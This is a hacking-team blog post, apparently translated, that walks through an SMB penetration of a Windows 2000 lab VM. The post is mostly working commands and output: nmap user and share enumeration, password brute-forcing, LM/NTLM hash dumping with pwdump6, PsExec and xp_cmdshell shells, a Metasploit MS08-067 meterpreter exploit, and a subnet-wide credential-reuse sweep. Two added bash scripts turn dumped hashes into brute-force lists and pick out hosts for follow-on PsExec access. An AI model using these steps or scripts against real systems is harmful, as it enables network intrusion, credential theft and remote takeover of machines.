K8拉登哥哥's Blog

K8搞基大队 [K8team] information security, network security, 0day vulnerabilities, penetration testing, hacking

nmap and msf penetration: don't assume nmap is only good for scanning

2012-11-02 01:53:18 | Category: Penetration testing


Start with a SYN scan plus version detection against the target (a Windows 2000 box in a VirtualBox VM, as the Cadmus MAC prefix shows):

root@bt:~# nmap -sS -sV 192.168.1.108

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (192.168.1.108)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
 
Ports 139 and 445 are open, so look at what the NSE script directory offers for SMB:

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
 
smb-enum-users lists the accounts on the remote machine. No credentials are supplied here, so everything below comes over an anonymous session:

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 192.168.1.108    // enumerate the accounts that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (192.168.1.108)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
 
smb-enum-shares lists the shares and what an anonymous session may do with each. Only IPC$ is readable without credentials, which is what made the user enumeration above possible:

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 192.168.1.108  // list shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (192.168.1.108)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
 
smb-brute guesses passwords for the accounts it finds, using nmap's default username and password lists unless userdb and passdb are given. Here it turns up a blank Administrator password and test:123456:

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 192.168.1.108        // brute-force user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (192.168.1.108)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
 
With a working credential the password hashes can be dumped. smb-pwdump lived in the experimental nmap-exp tree at the time; it drives pwdump6, whose binaries it expects under nselib/data, so fetch both and run the script with the test account, limiting the scan to the SMB/RPC ports:

root@bt:~# wget http://swamp.foofus.net/fizzgig/pwdump/pwdump6-1.7.2-exe-only.tar.bz2    // grab the hash dumper
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 192.168.1.108 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (192.168.1.108)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

Each line is user:RID => LM hash:NTLM hash. "NO PASSWORD" marks a blank password, matching the smb-brute result for Administrator. The test account's pair is exactly the LM and NTLM hash of "123456", and the LM hash ending in AAD3B435B51404EE (the value of an empty 7-byte half) already tells you the password is 7 characters or fewer before any cracking.
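The post later types these four lines into usernames.txt and password.txt by hand, keeping only the LM half of one hash. The script below is an added example, not code from the original post or from the nmap project: it converts smb-pwdump (pwdump6) output into the userdb/passdb lists that smb-brute takes, emits the full LM:NTLM pair per account (the form the smb library's smbhash script-arg also accepts), and classifies each LM hash by what it gives away. The sample input is copied from the output above; it assumes only bash, awk and coreutils.

```shell
#!/usr/bin/env bash
# Added example (not from the original post or the nmap project): turn
# smb-pwdump / pwdump6 output into the usernames.txt and password.txt lists
# that the post later feeds to smb-brute, and say what each LM hash reveals.
# Assumes only bash, awk and coreutils; the sample is copied from the post so
# the script runs offline.
set -eu

# Sample input: the four lines printed by smb-pwdump above.
SAMPLE_PWDUMP='Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2'

# An LM hash is two independent DES blocks over the two 7-byte halves of the
# upper-cased password. This constant is the block for an empty half, so it
# appears wherever the password is at most 7 characters (second half empty)
# or no LM hash was stored at all (both halves empty).
EMPTY_LM_HALF=AAD3B435B51404EE
EMPTY_NTLM=31D6CFE0D16AE931B73C59D7E0C089C0   # NTLM (MD4) of the empty string

# parse_pwdump: stdin -> "user rid lm ntlm", one account per line.
# pwdump prints "NO PASSWORD***..." for blank passwords; map that to the
# empty-password hashes so every row has the same shape.
parse_pwdump() {
  awk -v empty_lm="${EMPTY_LM_HALF}${EMPTY_LM_HALF}" -v empty_nt="$EMPTY_NTLM" '
    function is_hash(h) { return length(h) == 32 && h ~ /^[0-9A-F]+$/ }
    /=>/ {
      split($1, u, ":")               # "test:1002" -> user, rid
      sub(/^.*=> /, "")               # keep only "LM:NTLM"
      split($0, h, ":")
      lm = toupper(h[1]); nt = toupper(h[2])
      if (!is_hash(lm)) lm = empty_lm
      if (!is_hash(nt)) nt = empty_nt
      print u[1], u[2], lm, nt
    }'
}

# make_userdb: one account name per line, in pwdump order (userdb for smb-brute).
make_userdb() { parse_pwdump | awk '{ print $1 }'; }

# make_passdb: distinct "LM:NTLM" pairs for accounts that have a password.
# Blank-password accounts are left out: the smb-brute runs in the post find
# those on their own, so an empty hash would only add a wasted attempt per host.
make_passdb() {
  parse_pwdump | awk -v empty_lm="${EMPTY_LM_HALF}${EMPTY_LM_HALF}" \
    '$3 != empty_lm { print $3 ":" $4 }' | sort -u
}

# lm_class: what a single LM hash reveals before any cracking:
#   blank  both halves empty (no password, or no LM hash stored: NoLMHash
#          policy or a password longer than 14 characters)
#   short  second half empty, so the password is 7 characters or fewer
#   full   both halves populated, so the password is 8 to 14 characters
lm_class() {
  hash_uc=$(printf '%s' "$1" | tr 'a-f' 'A-F')
  case "$hash_uc" in
    "${EMPTY_LM_HALF}${EMPTY_LM_HALF}") echo blank ;;
    *"${EMPTY_LM_HALF}")                echo short ;;
    *)                                  echo full ;;
  esac
}

# report: one line per account with its class and the ready-to-use pair.
report() {
  parse_pwdump | while read -r user rid lm nt; do
    printf '%-16s rid=%-5s lm=%-5s %s:%s\n' "$user" "$rid" "$(lm_class "$lm")" "$lm" "$nt"
  done
}

main() {
  echo "== accounts =="
  printf '%s\n' "$SAMPLE_PWDUMP" | report
  echo "== usernames.txt =="
  printf '%s\n' "$SAMPLE_PWDUMP" | make_userdb
  echo "== password.txt =="
  printf '%s\n' "$SAMPLE_PWDUMP" | make_passdb
}

main
```

In real use, feed the script the saved smb-pwdump output instead of the embedded sample and redirect make_userdb and make_passdb into usernames.txt and password.txt. The "short" class is worth acting on by itself: a 7-character-or-less LM hash falls to a brute-force in minutes, so cracking it beats relaying the hash when you also want the cleartext for RDP on 3389.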
 
With the test credential, PsExec from a Windows attacker box gives a cmd shell on the target (the command is shown on one line; -e skips loading the account's profile):

C:\Documents and Settings\Administrator\桌面>psexec.exe \\192.168.1.108 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.108
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1

If the box also runs SQL Server and the sa password is known, osql reaches the same place through xp_cmdshell:

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 192.168.1.108 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "   // log in remotely as sa and execute commands
 
smb-check-vulns tests for a handful of known SMB bugs. Its own documentation warns that the checks can crash the target, so run it only where that is acceptable. Here it flags MS08-067:

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 192.168.1.108     // check the target for known vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (192.168.1.108)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
 
From here Metasploit takes over: ms08_067_netapi with a bind_tcp meterpreter payload, so RHOST is the only option that must be set (the module picks the target automatically):

root@bt:~# msfconsole                                             // exploit MS08-067 against the target from msf
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 192.168.1.108
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]      // press ctrl+z at the meterpreter prompt to background the session
msf  exploit(ms08_067_netapi) > sessions -l
 
Finally, reuse what was harvested against the rest of the subnet. The two usernames and the LM hash of test's password go into userdb/passdb files and smb-brute is pointed at the whole /24 (only the host that returned a hit is shown):

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254  // try the usernames and the captured hash against the whole subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful
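A /24 sweep like the one above produces one port table per live host, and the interesting lines are buried in it. The script below is an added example, not code from the original post or from nmap: it reads nmap's normal output (-oN) and prints one line per smb-brute login and per smb-check-vulns finding, keyed by host. The sample report is constructed from the page's own 192.168.1.105 and 192.168.1.108 results plus one invented quiet host; it assumes only bash, awk and coreutils.

```shell
#!/usr/bin/env bash
# Added example (not part of the original post or of nmap): pull the lines
# that matter out of a multi-host nmap report such as the /24 smb-brute
# sweep above, instead of reading 254 port tables by eye. Works on nmap's
# normal output (-oN); assumes only bash, awk and coreutils.
set -eu

# Constructed sample: the 192.168.1.105 hit from the sweep, a quiet host
# invented for the example, and the 192.168.1.108 results from earlier in
# the post, stitched together the way one -oN file would look.
SAMPLE_REPORT='Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful
Nmap scan report for 192.168.1.107
Host is up (0.00090s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
Host script results:
| smb-brute:
|_  No accounts found
Nmap scan report for bogon (192.168.1.108)
Host is up (0.00046s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
Nmap done: 3 IP addresses (3 hosts up) scanned in 28.22 seconds'

# smb_hits: nmap -oN report on stdin -> one tab-separated line per finding:
#   <host>  login  <user>  <password or hash>    from smb-brute
#   <host>  vuln   <id>                          from smb-check-vulns
# The host is carried forward from each "Nmap scan report for" header; the
# address in parentheses wins over a reverse-DNS name such as "bogon".
smb_hits() {
  awk '
    /^Nmap scan report for / {
      host = $NF
      gsub(/[()]/, "", host)
      next
    }
    /^\|/ && / => Login was successful/ {
      cred = $0
      sub(/^\|_? +/, "", cred)                   # drop the "| " / "|_ " prefix
      sub(/ => Login was successful.*$/, "", cred)
      i = index(cred, ":")                       # user names never contain ":", passwords may
      print host "\tlogin\t" substr(cred, 1, i - 1) "\t" substr(cred, i + 1)
      next
    }
    /^\|/ && /: VULNERABLE/ {
      id = $2; sub(/:$/, "", id)
      print host "\tvuln\t" id
    }'
}

# hosts_with_logins: distinct hosts where at least one credential worked;
# this is the list to hand to psexec or to the next sweep.
hosts_with_logins() {
  smb_hits | awk -F'\t' '$2 == "login" { print $1 }' | sort -u
}

main() {
  echo "== findings =="
  printf '%s\n' "$SAMPLE_REPORT" | smb_hits
  echo "== hosts with a working login =="
  printf '%s\n' "$SAMPLE_REPORT" | hosts_with_logins
}

main
```

For a real run, save the sweep with -oN and pipe the file through smb_hits instead of the sample. Normal output is fine for quick triage, but it is not a stable format; for anything that feeds another tool, write -oX and parse the XML.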